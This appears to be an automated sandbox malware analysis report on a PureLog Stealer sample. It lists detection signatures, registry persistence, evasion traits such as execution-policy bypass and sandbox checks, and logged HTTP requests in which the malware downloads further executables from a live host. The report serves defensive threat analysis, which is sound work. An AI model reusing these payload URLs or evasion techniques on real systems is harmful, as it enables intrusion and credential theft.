Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1458397
MD5: af4a6267ce7f24818feeb7d2d62e72c2
SHA1: dd780f62e9539c39244526e26e518663b53fb20e
SHA256: 43261f85db3ab88ed6e6b00b4227c5e8e90ddbcabb491109196a0643aeb3d313
Tags: exe
Infos:

Detection

PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe ReversingLabs: Detection: 13%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 13%
Source: file.exe Virustotal: Detection: 39% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:65277 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Fbedztzxbbe.pdb source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 07B8B94Ch 0_2_07B8B718
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 07B8B94Ch 0_2_07B8B708
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 07B8CF3Eh 0_2_07B8CE10
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 4x nop then jmp 06D5CF3Eh 3_2_06D5CE10
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 4x nop then jmp 06D5B94Ch 3_2_06D5B718
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 4x nop then jmp 06D5B94Ch 3_2_06D5B708
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 4x nop then jmp 056BD6D2h 11_2_056BD508
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 4x nop then jmp 056BD6D2h 11_2_056BD4F9
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 4x nop then jmp 056BD6D2h 11_2_056BD698
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 4x nop then jmp 056BD6D2h 11_2_056BD844

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 188.114.96.3:443 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 188.114.96.3:443 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2020482 ET CURRENT_EVENTS DRIVEBY GENERIC ShellExecute in Hex No Seps 188.114.96.3:443 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 188.114.96.3:443 -> 192.168.2.4:49732
Source: Traffic Snort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 188.114.96.3:443 -> 192.168.2.4:49732
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 77.221.140.76:58001
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /don2-m/kr/Wudbiu.exe HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /don2-m/Dllzeadr.pdf HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 77.221.140.76 77.221.140.76
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /don2-m/kr/Wudbiu.exe HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /don2-m/Dllzeadr.pdf HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
Source: global traffic DNS traffic detected: DNS query: 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
Source: powershell.exe, 00000001.00000002.2345847023.00000182CF8C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm8
Source: powershell.exe, 00000001.00000002.2289203789.00000182C7537000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: file.exe, 00000000.00000002.1789639440.0000000007729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microso
Source: file.exe, 00000000.00000002.1788650172.0000000007287000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft
Source: powershell.exe, 00000001.00000002.1923913361.00000182B76E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file.exe, 00000000.00000002.1763526633.0000000003371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B74C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.0000000003051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116C31000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1923913361.00000182B76E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.2347588371.000002112F32A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000001.00000002.1923913361.00000182B74C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.
Source: file.exe, 00000000.00000002.1763526633.0000000003371000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000000.1930459181.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002851000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe.4.dr String found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/Dllzeadr.pdf
Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/kr/Wudbi
Source: file.exe, TypeId.exe.0.dr String found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2/Qlxywcbxa.mp4
Source: powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000001.00000002.2345847023.00000182CF8C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ion=v4.5T
Source: powershell.exe, 00000001.00000002.2289203789.00000182C7537000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003170000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.0000000003200000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
